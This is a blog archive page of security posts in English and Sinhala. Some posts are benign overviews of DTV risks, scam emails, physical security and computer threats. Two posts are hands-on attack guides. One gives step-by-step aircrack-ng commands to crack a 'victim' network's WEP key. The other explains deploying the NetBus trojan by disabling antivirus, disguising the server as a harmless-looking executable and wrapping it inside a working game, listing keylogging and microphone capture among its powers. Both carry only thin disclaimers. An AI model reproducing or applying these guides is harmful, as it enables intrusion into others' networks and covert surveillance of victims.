Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Thursday, April 19, 2012

Security Vulnerability of Digital Television (DTV)

TV is a dominant equipment of every household in this planet. The newest trend in Television is Digital Television (DTV). With this change the television will be a hyper connected with internet. I have described about digital television in another post in detail. You can read that post here.
Its said that 100 million TVs will be connected to internet by 2016. This will open up a total new market and more other benefits. Other than that in the same time it will discover vast number of targets for hackers.
Internet connected TVs uses IP addresses (Internet Protocol) and they will be connected to internet almost every time the TV is on. So the network interfaces of these televisions will be always connected to internet.
Spoiler alerts says
"Our goal was to see if we could hack into the set-top box, steal customer personal information, pirate services, and incur denial-of-service conditions. Just for yucks, I added two more objectives: to see if we could steal porn (typically, one of the biggest revenue streams for cable companies) or force porn onto another television that was watching Disney content, with the idea that offended customers would drop their service."
So what we can do is avoiding internet connected television but prevent doing transactions over internet connected television and be more conscious about what we are watching. Obviously television producers will come up with security options to prevent these vulnerabilities yet hackers will always find a way.

Tuesday, April 17, 2012

Hack a Wi-Fi Network’s WEP Password with Linux

I started my internship program this month so I don't find much time to spend writing long articles. So I thought to show how to crack a Wi- Fi Network's WEP password. Again I must say at the beginning that I show this for educational purposes. So if you hack someones Wi-Fi network with this please take their written authority. And do on your own risk :)

This hack only works for WEP passwords. So the victim should have used WEP in their Wi-Fi network. For other authentication methods like WPA or WPA2 are also breakable. There are tools out there to hack WPA2 authentication also but that takes time and long process than this I will consider posting an article on that later. So lets see how to do the hack.

Do do this hack in the way I am going to describe you have to have Linux operating system. I would recommend you to have Ubuntu. Specialty with Ubuntu is its more user frendly and the terminal commands I will give will work on Ubuntu (commands like apt-get may change in other Linux distributions). And I take the assumption that you are familiar with Linux operating systems. (If you find any difficulty please ask)

Below are the steps:-
Use terminal and grant user super user or administrator rights. User can get it with su command or sudo bash command

1. Install Aircrack-ng (This is the tool used to crack the wifi. This tool does not come with Ubuntu hence you have to install it on terminal)
        apt-get install aircrack-ng   (Update Ubuntu before you use this command
apt-get update.)

2. Run the following to get a list of your network interfaces.
     airmon-ng

3. Stop running Wireless interfaces.
     airmon-ng stop (interface)
     ifconfig (interface) down (We stop running wireless interface to change the MAC address of the interface)

4. Change the MAC Address of the wireless interface.
     macchanger --mac 00:11:22:33:44:55 (interface) (You can add any MAC address here.We change the MAC address for security reasons this step is recommended but not essential)

5. Start monitoring the packets.
     airmon-ng start (interface)

6. Dumps the packets. (You have to keep running the result of previous command and for this command open new terminal.We have to dump packets into a file so we can use that file when cracking the password)
     airodump-ng -c (channel) -b (bssid) -w (file name) (interface) (Channel and BSSID can be taken from the result of airmon-ng start (interface) command)

7. Creating Traffic (You have to keep running previous two terminals and open a new terminal and use following command to boost up the traffic. This is useful when you have only one station to communicate with the router. This boost up the traffic so it will capture more data).
         aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

8. Replay attack to fast the hack. (Open a new terminal for this command. This command is also for boosing up the hack with ARP requests)
         aireplay-ng -2 -p 0841 -c (dmac) -b (bssid) (interface)

9. Wait till Data section exceed at least 10,000 (number of data gathering change according to the size of the WEP key) in airmon-ng terminal and then hack for the key with following command.
     aircrack-ng -b (bssid) (file name-01.cap)

After executing this command you will get the WEP password of thevictim Wi-Fi network.

Enjoy!!!

Thursday, October 20, 2011

බොරු Email?


අපි හැමෝටම දවසකට විවිදාකාරයේ email පණිවුඩ ලැබෙනවා. යාලුවොන්ගෙන්, වැඩ කරන තැනින්, ඉගෙන ගන්න තැනින් හැරුනම වැඩියෙන්ම මේ වගේ දේවල් එන්නෙ අපි Register වෙලා ඉන්න විවිධාකාරයේ වෙබ් අඩවි වලින් (facebook එහෙම). ඒත් එක්කම මෙහෙම එන email වර්ගයක් තමයි Scam emails කියන්නෙ.

Scam email කියන්නෙ. අපිව රවටල අපේ තොරතුරු ගන්න හෝ මුදල් ගන්න එන email වලට. මේවා එක එක ආකාරයෙන්, එක එක කතන්දර කිය කිය එන්න පුලුවන්. මේ Scam email අපිට මෙහෙම වර්ග කරන්න පුලුවන්. මම මේ වර්ගීකරණයන් ගත්තෙ මෙන්න මේ වෙබ් අඩවියෙන් http://www.scamwarners.com/
  • Fraudulent check scams - මේවයේ අපිට බොරු චෙක් පත් email විදිහට එනවා.
  • Fraudulent lotteries - මෙහිදී ඔබට ලොතරැයි දිනුමක් ලැබුනා යැයි පවසා තොරතුරු ගැනීම හෝ දිනුම ලබා ගැනීමට ගෙවීමක් කරන්න ලෙස කියා සිටිනවා.
  • Romance scams - මේකෙදි Scammer ඔබට කැමති බව හෝ වැනත් ආකාරයක රොමැන්ටික් දෙයක් කියනවා.
  • Money recovery scams - මේ email එක එන්නෙ කලින්ම වෙන බොරු email එකකට අහු උන කෙනෙක්ව තවත් ඉදිරියට ගෙනියන්න.
  • Charity scams - සමාජ සේවා ආයතන විදිහට මුදල් ඉල්ලා එන email.
  • Employment scams - බොරු රැකියා අවස්තා පෙන්නල එවන email.
  • Auction site and online selling scams - අන්තර්ජාලය හරහා ගනුදෙනු කරන අය (බඩු ගන්න/විකුණන අය) ඉලක්ක කරල එන email.
  • Rental scams - ඔබේ ණය හිමි හෝ ගෙවල් අයිතිකාරයෙක් විදිහට එවන email.
  • Debt collection scams - ඔබ කාට හරි, ආයතනයකට හරි ණයක් වෙලා තියෙනවානම් ඒ ණය වාරික ඔබෙන් රවටා අදාල ආයතනය හෝ පුද්ගලයා විදිහට ගන්න හදන email.
  • Advance fee loan scams - ණය දෙන්නො විදිහට පෙනී ඉදල ඔබව රවටන්නට තැත් දරන email.
  • Conference scams - බොරු සම්මන්ත්‍රණ සඳහා සහභාගී වෙන්න ඔබට ආරාධනා පත් එවන email.
  • Pet scams or puppy scams - මේකෙදි වෙන්නෙ ඔබට සුරතක් සතෙක් විකුණන හෝ දෙන මුවාවෙන් email එවන එක.
  • Fraudulent websites used in scams - Scammer විසින් හදපු වෙබ් අඩවියකට (මෙය ඔබේ බැංකුවේ වෙබ් අඩවියට සමානව හෝ ඔබ ගණුදෙණු කරන වෙනත් අඩවියකට සමානව සකස් වෙලා තියෙන්නෙ පුලුවන්) ඔබව navigate කරන සබැදි සහිතව email මෙහිදී එවනු ලබනවා.
මේ විදිහට එන Scam email වැඩි වශයෙන් ඉලක්ක කරන්නෙ ඔබව රවටල මුදල් ගැනීම හෝ ඔබේ තොරතුරු (බැංකු ගිණුම් අංක වගේ) ලබා ගන්න. පසුව ඒවා වෙනත් ඔවුන්ට අවශ්‍ය දේවල් වලට යොදා ගන්නවා.


මෙහෙම Scammers ලා අපේ email ලිපින දැන ගන්නෙ කොහොමද? ඒකට විවිධ ආකාර තියෙන්න පුලුවන්. උදාහරණ විදිහට,
  • අපි විවිධ වෙබ් අඩවි වල ලියා පදිචි වෙනවා විවිධ දේවල් වලට (බාගත කිරීම් කරන්න, ෆෝරම් කියවන්න වගේ) මේ අඩවි වලින් අපේ email ලිපින ඉල්ලනවා ලියාපදිංචිය සඳහා.
  • දම්වැල් email, ඒ කියන්නෙ විවිධ පණිවුඩ, පින්තූර අපි forward කර කර යවන email. මේ මඟිනුත් පුලුවන් email ලිපින ලබා ගන්න.
මේ ආකාරයෙන් විවිධ ක්‍රම වලින් ලබා ගන්න එ මේල් තොග විදිහට වෙළද ප්‍රවර්ධන කරන අයට, Scammers ලාට වගේ අවශ්‍ය අයට විකුණනවා. මේ තියෙන්නෙ ඒ වගේ අඩවි දෙකක්,
මෙහෙම එන බොරු email එකක් වටහා ගන්නෙ කොහොමද?. ගොඩක් දුරට මේ වගේ email ඒවායේ තියෙන කතන්දරයෙම තේරුම ගන්න පුලුවන්. ගොඩක් දුරට මේ email එකක් එන්නෙ පුද්ගලයෙක් විදිහට. මට මේ ලඟදි ආපු email එකක් තමයි,

Sane Timo කියන පුද්ගලයාගෙන් Timo.Sane@hus.fi කියන email ලිපිනයෙන් මට මොකක්දෝ දිනුමක් ලැබුනා කියල ආපු email එක. මම ඉතින් මෙයාගෙ Timo.Sane@hus.fi කියන email ලිපිනය කොපි කරල ගූගල් කරපු එක. මෙන්න එතකොට එනවා මේක ගැන අනතුරු ඇගවීම තියෙන Scam Warning වෙබ් අඩවි වල හා ෆෝරම් වල ලිපි. මෙන්න එකක් http://www.scamwarners.com/forum/viewtopic.php?f=12&t=25181&p=71301

මේ Scam Warning වෙබ් අඩවි කියන්නෙ මේ වගේ email හරහා එන විවිදාකාරයේ Scam ගැන පුද්ගලයො අනිත් අයට කියන වෙබ් අඩවි. බොරු email එකක් එකවර ලක්ෂ ගනනක email list වලට යන නිසා ඉක්මනින්ම මේ වගේ වෙබ් අඩවියක ඒක ගැන ඇත්ත කියල වෙබ් අඩවියක කුමක් හරි පල වෙනවා. ඒ නිසා මම යෝජනා කරන්නෙ මේ වගේ එකක් ආපුහාම ඒ ආපු email ලිපිනය සෙවුම් යන්ත්‍රයකින් (Search Engine such as google or yahoo) සොයන්න (Search). එතකොට ගොඩක් දුරට මේ ගැන ඇත්ත සොයා ගන්න පුලුවන්. ඒ වගේම මේ වගේ email එකක් කියෙව්වම තේරෙනවා මේ මොකක්ද කියල. නමුත් සමහර අය ඉතා දක්ෂ විදිහට සංවිධානය වෙලා තොරතුරු සහිතව එවන්නත් පුලුවන් ඒ නිසා හොයල බලන එක වැදගත්. මෙන්න අර කියපු වගේ Scam Warning වෙබ් අඩවි කීපයක්,

Sunday, October 16, 2011

Why Physical Security of an Organization is so Crucial?


Security of an organization very important and today organization take various actions to protect their information, assets and other important things. When looking at the security of an organization from a IT aspect, majority of people only consider about securing the organization using IT related solutions. They maybe add firewalls, make security policies, make better authentication systems...etc. When intruders find that organization is not vulnerable through networks or from other IT aspects they focus on physical vulnerabilities to accomplish their target.So if they only address the problem from such angle omitting the physical security fact of the organization, all other security precautions can be useless or will not give the outcome that they expected.

Main objective of ensuring security in an organization is ensure that Confidentiality, Integrity and Availability (CIA) of information within the organization is achieved. As an example due to a natural disaster the information can be destroyed. Hence at that point clearly the availability of information is lost. Hence it is very important to assure the physical security of an organization.


Physical security has risks and vulnerabilities that are different than other security concerns we can find related to IT security of an organization. These include physical destruction of hardware, intruders, environmental issues, theft and vandalism.

Physical threats can be divided into four categories broadly,
  • Politically motivated threats: Strikes, riots, civil disobedience, terrorist attacks, bombings...etc
  • Supply system threats: Power distribution outages, communications interruptions, and interruption of other natural energy resources such as water, steam, gas, and so forth.
  • Natural environmental threats: Floods, earth quacks, storms, tsunami and tornadoes, fires, extreme temperature conditions...etc
  • Manmade threats: Unauthorized access internally and externally, explosions, damages by offensive employees, misuse, employee mistakes and accidents, vandalism, fraud, theft and so on.
In these situations the primary consideration should be protecting human lives. Once life safety is achieved other concerns of information security can be addressed.

Wednesday, October 12, 2011

පරිඝනකයට එල්ල වන සතුරු උවදුරු හා අතුරු ආන්තරා

අපි හැකින් ගැන අහල තියෙනවා. හැමෝම වගේ වෛරස් ගාඩ් ගැන දන්නවා. වින්ඩෝස් වල නිතරම ෆයර්වෝල් ගැන එක එක ඒවා එනවා. මේ හැම දෙයක්ම පරිඝනකයේ ආරක්ශාව සම්බන්ද දේවල්. මොනවයින්ද පරිඝනකයක් මේ තරම් ආරක්ශා කරන්න ඕනි? ඒ හේතු ආකාර ගැන හැකි පමණ සරලව මේ ලිපියෙන් මම විස්තර කරන්නම්. මම වෙනත් ලිපියකින් පරිඝනකයක් ආරක්ෂා කරන්න ගන්න ඕනි ක්‍රියා මාර්ග ගැන කියන්න බලාපොරොත්තු වෙන නිසා මේ ලිපියෙන් කියන්නෙ උවදුරු හා ආන්තරා ගැන විතරයි.



ප්‍රධාන වශයෙන් පරිඝනකයකට ප්‍රහාර හා උපද්‍රව එල්ල වෙන්නෙ අන්තර්ජාලය හරහා. නමුත් පරිඝනකයකට අන්තර්ජාලය නැතිව උනත් විවිද උපද්‍රව සිදු වෙන්න පුලුවන්. අපි පළමුවෙන්ම එහෙම අන්තර්ජාලය නැතිව වියහැකි අනතුරු ගැන කතා කරමු.
  • සොරකම් කිරීම: මේ කියන්නෙ අන්තර්ජාලය හරහා කරන හොරකම් නෙමෙයි. ඇත්ත ලෝකේ භෞතිකව වෙන හොරකම් ගැන.
  • විදුලි දෝශ: විදුලිය ඇන හිටීම, එකවර විශාල විදුලි ධාරිතාවයක් පැමිණීම, විදුලිය නිසි ධාරිතාවයට වඩා අඩුවෙන් (ඩිම්) පැමිණිම වැනි හේතු නිසා පරිඝනක පද්ධතියේ ඉලෙක්ට්‍රොනික උපාංග වලට හානි සිදු වෙන්න පුළුවන්.
  • ඩිස්ක් ඇන හිටීම (Disk Failure): විවිද හේතු නිසා දත්ත ගබඩා කරල තියෙන හාර්ඩ් ඩිස්ක් වැඩ කරන්නෙ නැතුව යන්න පුළුවන්. මේ විදිහට ඩිස්ක් වැඩ කරන්නෙ නැතුව යන එකෙන් දත්ත නැති වීම නිතරම දකින්න පුලුවන් දෙයක්.
දැන් අපි බලමු අන්තර්ජාලය හරහා පිටස්තර ප්‍රහාරකයෙක්ට ඔබේ පරිඝනකයට සිදු කරන්න පුලුවන් ප්‍රහාර හා අනතුරු ගැන.

  • ට්‍රෝජන් අශ්වයන් භාවිත කිරීම: මම මේ ගැන වෙනම ලිපියක් ලියල තියෙනවා. ඒ ලිපිය මෙතනින් ගිහින් කියවන්න පුලුවන්. ඒ විතරක් නෙමෙයි ට්‍රෝජන් අශ්වයෙක් වෙන පරිඝනකයකට යවන ආකාරය ගැන ලියපු ලිපිය මෙතනින් ගිහින් කියවන්න.
  • Packet Sniffing: පරිඝනක ජාල (Network) හරහා දත්ත හුවමාරු වෙන්නෙ Data Packet විදිහට. මේ විදිහට පැකට් විදිහට ජාල හරහා හුවමාරු වෙන තොරතුරු ග්‍රහණය කරන එක තමයි වෙන්නෙ පැකට් ස්නිෆිං වලදි. මේ සඳහා ගොඩක් වෙලාවට Packet Sniffers කියන වැඩසටහන් වර්ගය තමයි භාවිත වෙන්නෙ. මේ විදිහට පාස්වර්ඩ් වගේ සංවේදී දත්ත සොරකමට ලක් වෙන්න පුලුවන්.
  • චැට් හරහා (Chat Clients): අන්තර්ජාලය තුල පණිවුඩ හුවමාරු කර ගන්න විවිධ චැට් මෘදුකාංග හා වෙබ් අඩවි භාවිත කරනවා. මේ සමහර චැට් හරහා executable codes හුවමාරු කරන්න පුලුවන් නිසා පරිඝනකයට හරහා ප්‍රහාර එල්ල වෙන්න පුළුවන්.
  • පෑල දොරවල් හා දුරස්ත පරිපාලන වැඩසටහන් (Back Doors and Remote Administration Programs): වින්ඩෝස් මෙහෙයුම් පද්ධතිය ක්‍රියාත්මක වන පරිඝනක විශාල වශයෙන් මේ ආකාරයේ උවදුරු වලට ලක් වෙනවා. මේ වැඩසටහන් උපයෝගයෙන් පිටස්තරයෙක්ට පුලුවන් ඔබේ පරිඝනකයට අන්තර්ජාලය හරහා වෙනත් ස්ථානයක සිට ඇතුල්වන්න සහ පාලනය කරන්න.
  • Denial of Service : මෙය එක් ආකාරයක හැකර් ප්‍රහාරයක්. DoS හෙවත් Denial of Service ලෙස මේක හැදින්වෙනවා. මේකෙන් ඔබේ පරිඝනකය ක්‍රියා විරහිත කරන්න හෝ වෙනත් දත්ත Process කිරීම තුල කාර්ය බහුල කරන්න පුලුවන්. මෙයින් සිදු වන්නෙ ඔබට ඔබේ පරිඝනකය එම ප්‍රහාරය පවතින තාක් භාවිත කරන්න නොහැකි වීමයි.
  • වෙනත් පරිඝනකයකට එල්ල වෙන ප්‍රහාරයකට අතරමැදියෙකු විදිහට ඔබව භාවිත වීම: මේ ආකාරයේ ප්‍රහාරයකට කියන්නෙ DDoS හෙවත් Distributed Denail of Service කියල. මේ ඩීඩොස් වැඩසටහන් පාවිච්චි කරල ඔබේ පරිඝනකය බළල් අතක් විදිහට වෙනත් අකටයුත්තක් සඳහා හැකර්ලා පාවිච්චි කරන්න පුලුවන්.
  • අනාරක්ෂිත Windows Shares: ඔබේ පරිඝනකයේ තිබෙන අනාරක්ෂිත Sheres ප්‍රහාරකයෙකුට තමන්ගේ Worms, Bots, Viruses වගේ වැඩසටහන් ස්තාපනය කරන්න ඉඩකඩ සලසනවා.
  • Mobile Codes (Java, JavaScript, ActiveX): පරිඝනකයේ ස්ථාපනය කරන විවිධ ආකාරයේ Mobile Codes නිසා පරිඝනකයක ආරක්ෂාවට ප්‍රශ්න ඇති වෙන්න පුළුවන්. මේ Programming Language නිසා වෙබ් අඩවි ගොඩනගන්නන්ට පුලුවන් විවිධ කේත (Codes) ලියා ඒවා ඔබේ බ්‍රව්සරය (Browser) තුල ක්‍රියාත්මක (Execute) කරවන්න පුළුවන්. මේ විදිහට බහුලව පාවිච්චි වෙන Mobile Codes තමයි Java, JavaScript, ActiveX යන ඒවා. මේවා වෙබ් අඩවි ගොඩනගන්නන්ට වගේම හැකර් කෙනෙකුටත් පුලුවන් ඔබේ පරිඝනකයේ තොරතුරු එකතු කරන්න හා වෙනත් හානි කර කේතයක් ක්‍රියාත්මක කරන්න.
  • Cross-Site Scripting: මෙහිදී සිදු වන්නේ යම් ප්‍රහාරකයෙකු විසින් වෙබ් අඩවියකට කුමක් හෝ Script එකක් අමුණා යැවීමයි. ඉන් පසු යම් අවස්ථාවක ඒ වෙබ් අඩවිය ඔබට ප්‍රතිචාර දක්වනකොට අදාල හානිකර Script එකත් ඔබේ බ්‍රව්සරය හරහා පරිඝනකයට පැමිණීමයි. මෙවැනි වලට පරිඝනකයක් නිරාවරණය වන ආකාර ප්‍රධාන වශයෙන්, අවිශ්වාස කටයුතු වෙබ් අඩවි වල ෆෝරම් හා චැට් වලට සම්බන්ද වීම, ලින්ක් එකක් ඔබව ගෙනියන්නේ කොහේටද නොදැන ඒවා භාවිත කිරීම වැනි ආකාර හඳුන්වන්න පුලුවන්.
  • Email Spoofing: මෙහිදී සිදු වන්නේ ඔබට යම් වෙබ් අඩවියකින් යැයි පෙන්වමින් Email එකක් එවනවා. නමුත් එය ඔබව ගෙනි යන්නේ ඔවුන් පෙන්වා දෙන අඩවියට නෙමෙයි. උදාහරණයක් විදිහට ඔබට බැංකුවේ වෙබ් අඩවියෙන් ලෙස පෙන්වා දෙමින් ඊමේල් එකක් එනවා ඔබ බැංකුවේ වෙබ් අඩවියට යාමට එය භාවිතා කරනවා නමුත් ඔබ යන්නේ ප්‍රහාරකයා විසින් නිර්මාණය කළ වෙනත් අඩවියකට. මෙය ප්‍රධාන වශයෙන් පාස්වර්ඩ් වැනි දේ සොරකම් කරන්න භාවිත වෙනවා.
  • Email-Borne Viruses: මේවා තමයි ඊමේල් ඇමිණුම් (Attachments) විදිහට පැමිණෙන හානිකර කේත (Malicious Code). මෙවන් ඊමේලක ඇමිණුම විවෘත කරපු ගමන්ම අදාල හානිකර කේතය පරිඝනකය තුල ක්‍රියාත්මක වෙනවා.
  • Hidden File Extensions: වින්ඩෝස් මෙහෙයුම් පද්ධති වල Option එකක් තියෙනවා Hidden File Extensions for Known File Types සඳහා. මේ Option එක සාමාන්‍යයෙන් ක්‍රියාත්මක වෙලා තමයි තියෙන්නෙ. මේවාත් වැඩි වශයෙන් ඊමේල් ඇමිණුම් විදිහට තමයි පැමිණෙන්නෙ. විවිද අනාරක්ශිත වෙබ් අඩවි වලින් බාගත කර ගන්න වීඩියෝ, ඕඩියෝ (Video/Audio) ගොනු වලත් මේ වගේ Hidden File Extensions තියෙන්න පුලුවන්. මෙයට උදාහරණ විදිහට,
  1. Downloader (MySis.avi.exe or QuickFlick.mpg.exe)
  2. VBS/Timofonica (TIMOFONICA.TXT.vbs)
  3. VBS/CoolNote (COOL_NOTEPAD_DEMO.TXT.vbs)
  4. VBS/OnTheFly (AnnaKournikova.jpg.vbs)
මේ ආකාරයෙන් විවිධ ආකාරයේ සතුරු උවදුරු හා අනතුරු පරිඝනකයට එල්ල වෙන්න පුලුවන්. මේ විවිද වූ අනතුරු හා උවදුරු වලින් පරිඝනකය හා ඔබේ තොරතුරු ආරක්ශා කර ගන්න ගත යුතු ක්‍රියා මාර්ග ගැන වෙනත් ලිපියකින් ලියන්නම්.

Saturday, October 1, 2011

ට්‍රෝජන් අශ්වයෙක් පරිඝනකයකට දක්කන්න!!


මේ ලිපියෙන් මම අද කියන්න යන්නෙ කොහොමද ට්‍රෝජන් අශ්වයෙක් වෙනත් පරිඝනකයකට යවල. ඒ ට්‍රෝජන් අශ්වය ලවා අදාල පරිඝනකත් එක්ක සෙල්ලම් කරන්නෙ කියල. ට්‍රෝජන් අශ්වයන්ගෙ ක්‍රියා කාරීත්වය ගැන මම සවිතරාත්මක ලිපියක් කලින් ලියපු නිසා මේ ලිපියෙන් මම ඒ ගැන කියන්න යන්නෙ නෑ. කියවපු නැති කෙනෙක් ඉන්නවනම් මෙතනින් ගිහින් ඒකත් කියවලම එන්න.

මම පහුගිය ලිපියෙන් පැහැදිලි කළා අපිට පහසුවෙන් භාවිත කරන්න පුළුවන් ට්‍රෝජන් අශ්ව මෘදුකාංග තියෙනවා කියන එක. මම ඒ වගේ මෘදුකාංග කීපයක නම් පහතින් සඳහන් කරන්නම්,
  • Tini
  • Netcat
  • SubSeven
  • Back Orifice 2000
  • NetBus
මෙතන තියෙන මෘදුකාංග වලින් NetBus කියන ට්‍රෝජන් අශ්වයා භාවිත කරන ආකාරය තමයි මම අද කියන්න යන්නෙ. ඊට කලින් අනිවාර්යයෙන් සඳහන් කරන්න ඕනි ට්‍රෝජන් අශ්වයෙක් වෙනත් අයෙකුගේ පරිඝනයකට හෝ පරිඝනක පද්ධතියට යවල හැක් කරන එක නීති විරෝදී කියන එක. ඒ නිසා ට්‍රෝජන් අශ්වයෙක් යවන්න කලින් ඒ පුද්ගලයා හෝ ආයතනය දැනුවත් කරල අනුමැතිය ලබා ගැනීම වැදගත්.

ඒ වගේම ඔබට ඔබේ පරිඝනකය හෝ පරිඝනක පද්ධතිය ට්‍රෝජන් අශ්ව ප්‍රහාර වලට මුහුණ දෙන්නෙ කොහොමද කියල දැන ගන්නත් ඒ වගේ ප්‍රහාරයක් කිරීමෙන් දැන ගන්න පුළුවන්.


මම මාතෘකාවට දක්කනව වගේ වචනයක් දැම්මට ට්‍රෝජන් අශ්වයන් යැවීම ප්‍රහාරයක් (Attack) හා යවන්නා ප්‍රහාරකයෙක් (Attacker) විදිහට තමයි සැලකෙන්නෙ. ඒ නිසා දැනුමට හා විනෝදයක් ලබන්න ප්‍රහාරය අනුමැතිය සහිතව (මේකත් ලිඛිත වන්න ඕනි) කරන්න කියල මම ඉල්ලා සිටිනවා. මොකද මෙයින් ලබා ගන්නා දැනුමකින් ඔබ කරන ක්‍රියා සම්බන්ධයෙන් වගකීමක් මට නැහැ.

බය කළා ඇතිනෙ, දැන් වැඩේට බහිමු. මම කලින් කිව්වා මම ඔබට පාවිච්චි කරන්න කියල දෙන්නෙ NetBus කියන ට්‍රෝජන් අශ්ව මෘදුකාංගය කියල. මේ මෘදුකාංගය ඉතාමත් ප්‍රසිද්ධ ට්‍රෝජන් අශ්ව මෘදුකාංගයක්. ඉස්සෙල්ලම මෘදුකාංගය මෙතනින් ගිහින් භාගත කරන්න. භාගත කරන්න කලින් ඉස්සෙල්ලම Virus Guard හා Fire Wall අක්‍රීය (Disable) කරන්න.


හැම ට්‍රෝජන් අශ්වයෙක් වගේම NetBus ටත් ප්‍රධාන කොටස් දෙකක් තියෙනවා. ඒ තමයි,
  1. Client
  2. Server
මෙතනින් සර්වර් ෆයිල් එක තමයි ට්‍රෝජන් අශ්වයාට ගොදුරු වෙනාගෙ පරිඝනකයේ ස්ථාපනය කරන්නෙ. Client එකෙන් තමයි අපි හැක් කරන්නෙ. හැක් කරන ආකාරය දැන ගන්න කලින් අපි බලමු නෙට්බසය පාවිච්චි කරල වෙනත් පරිඝනකයකට ඔබේ පරිඝනයකේ ඉඳන් මොනවාද කරන්න පුළුවන් කියලා,
  • CD/DVD-ROM ඇරීම හා වැසීම
  • BMP/JPG පින්තූර දිස් වීමට සැලැස්වීම
  • මූසිකයයේ (Mouse)බොත්තම් (Button) වල වම දකුණ මාරු කිරීම
  • වෙනත් වැඩසටහන් ආරම්භ කිරීම
  • WAV ගොනු ධාවනය කිරීම
  • මූසිකය පාලනය කිරීම
  • විවිධාකාරයේ පණිවුඩ දිස් වීමට සැලැස්වීම
  • වින්ඩෝස් මෙහෙයුම් පද්ධතිය (OS) වැසීම (Shut Down)
  • ගොනු(Files) Download/Upload/Delete කිරීම
  • Keystrokes යැවීම සහ යතුරු (Keys) අත්හිටුවීම (Disable)
  • විකල්ප URL එකකට යැවීම
  • Keystrokes ග්‍රහණය කර ගැනීම
  • Screendump ගැනීම
  • පරිඝනකයේ ශබ්දය අඩු වැඩි කිරීම
  • පරිඝනකයේ මයික්‍රෆෝනයෙන් ශබ්ද පටිගත කිරීම
වැනි විවිධාකාර දේවල් රාශියක් NetBus ට්‍රෝජන් අශ්වයාට කරන්න පුළුවන්.

මෙය භාවිතයෙන් හැක් කිරීමේදී වඩාත් වැදගත් වෙන්නෙ ඔබේ ගොදුරට (Victim) සර්වර් ෆයිල් එක ඔහුගේ පරිඝනකය තුල ස්ථාපනය කර වීමයි. ඔබ අද්‍යාපනික අරමුණකින් කරනවානම් ගොදුරගෙ අනුමැතිය ඇතුවම මේක ස්තාපනය කරන්න පුලුවන් බොහොම ලේසියෙන් නමුත් හැක් කරනකොට එහෙම අනුමැතිය ලැබෙන්නෙ නෑ. ඉතින් මේ සඳහා හැකර්ලා විවිධ ආකාර පාවිච්චි කරනවා. ඔබගේ දැන ගැනීමට මම ඒ ආකරයක් දෙකක් පැහැදිලි කරන්නම්.

අපිට පුළුවන් මේ ට්‍රෝජන් අශ්වයා වෙනත් නමකින් නම් කරන්න. ඒ කියන්නෙ දකින්නාට හිතෙනවා මේක වෙන දෙයක් කියල. උදාහරණයකට අපිට පුළුවන් ඒක Beauty_of_Sri_Lanka.exe වගේ නමකින් නම් කරන්න. දැක්කම අපිට හිතෙනවා මේක මොකක් හරි ලංකාවෙ සොබා දම වගේ දෙයක් ගැන අදාල මොකක් හරි කියල. එහෙම හිතල ඒක ධාවනය කරනවා. එතකොට කිසිම දෙයක් වුන බවක් ගොදුරට පෙනෙන්නෙ. නමුත් ඔහු ඒක ධාවනය කරපු ගමන් ඔහුට නොපෙනී ට්‍රෝජන් අශ්වයා පරිඝනකය තුල ස්තාපනය වෙනවා. එක්කො මේක ගේම් එකක් විදිහට නම් කරන්න පුළුවන් Bubble.exe හෝ PacMan.exe වගේ. මෙතනදි අපි බලාපොරොත්තු වෙන්නෙ ඉහල අවස්ථාවෙ වගේම හොඳ ගේම් එකක් නමුත් ධාවනය කරපුවාම කිසිම දෙයක් වෙන්නෙ නෑ ඉතින් අපිත් දෙතුන් සැරයක් රන් කරල අතෑරල දානවා නමුත් අපිට නොපෙනීම අපි විසින්ම ට්‍රෝජන් අශ්වයා අපේ පරිඝනකයට රිංගලා. ඒකයි මේකට ට්‍රෝජන් අශ්වයා කියන්නෙ මම ඒ ගැන කලින් ලිපියෙ කිව්වා. මේ විදිහට කී සැරයක් ඔයාලත් රන් කරපුහාම මොකවත් නොවුන ෆයිල් රන් කරලා තියෙනවාද?


ඒ වගේම හැකර්ලා තවත් ආකාරයක් භාවිතා කරනවා. ඒ තමයි Wrapper එකක් අනුසාරයෙන් ට්‍රෝජන් අශ්වයා ඇත්තටම වැඩ කරන වැඩසටහනකට එතීම. උදාහරණයක් විදිහට ඇත්තටම වැඩ කරන හැමෝම ආස චෙස් ගේම් එකක් තියෙනවා Chess.exe කියලා. ඒකෙ ගොනුවේ ප්‍රමාණය (File Size) 500KB කියල හිතමුකො. හැකර් කරන්නෙ Wrapper වැඩසටහනක් ආධාරයෙන් ට්‍රෝජන් අශ්වයාවත් (මෙයත් exe ෆයිල් එකක්ම තමයි) Chess.exe එකටම එතීම හෙවත් සැඟවීම එතකොට ෆයිල් එක 600KB විතර වෙනවා. එතකොට ඔබ අර ගේම් එක ස්තාපනය කරපුවාම ඇත්තටම ගේම් එක ස්තාපනය වෙනවා (ඒක අපිට සෙල්ලම් කරන්නත් පුළුවන්) ඒත් එක්කම ඒකෙ හංගල එවපු ට්‍රෝජන් අශ්වයාත් ස්තාපනය වෙනවා. කොටින්ම අපි එක exe ෆයිල් එකක් රන් (Run) කරනකොට ඇත්තටම දෙකක් රන් වෙලා. ඇත්තටම ට්‍රෝජන් අශ්වයා කියන්නෙ වෙනත් වේශයකින් එන පහරදීමක්. අපිම තමයි නොදැනුවත්ව පහර දීම පාවඩ දාල පිලිගන්නෙත්. ඇත්තටම අර තුසර පුර සංග්‍රාමයේදි උනා වගේ.

මෙහෙම ස්තාපනය උන ගොදුරු පරිඝනකය අන්තර්ජාලයට හෝ LAN එකට සම්බන්ද උන ගමන් පහර දෙන්නාට පුළුවන් අර උඩ තියෙන වින්ඩෝව් එකෙ තියෙන දේවල් කරන්න. ඒවා කරන ආකාරය හොඳට පෙන්වන වීඩියෝවක් මට හම්බ උනා. ඒකෙන් බලල ඉතිරි ටික කර ගන්න එක කජු කනව වගේ තමයි. මම ඔයාලට දුන්න NetBus ට්‍රෝජන් අශ්වයා හොඳට වැඩ. මම මේක ලියන්න කලියෙන් ඒක මගේ ගෙදර තියෙන LAN එකට සම්බන්ධ අනිත් පරිඝනකයකට දාල ටෙස්ට් කලා. මම ආසම CD-ROM වැඩේට ඒක හරිම අත්බූත බවක් දෙනව නිකන්ම එක ඇරෙන වැහෙන එක. ඔය යටින් තියෙන වීඩියෝව බලල ඉතුරු හරිය කරන්න.



මේ ලිපියේ අඩංගු සියලුම කරුණූ අධ්‍යාපනික අරමුණකින් ප්‍රදර්ශනය සඳහා පමණක් පල කළ ඒවා බව සලකන්න.

All content of this post are only for demonstration purpose and do not try this without a proper authorization document form the potential victim.

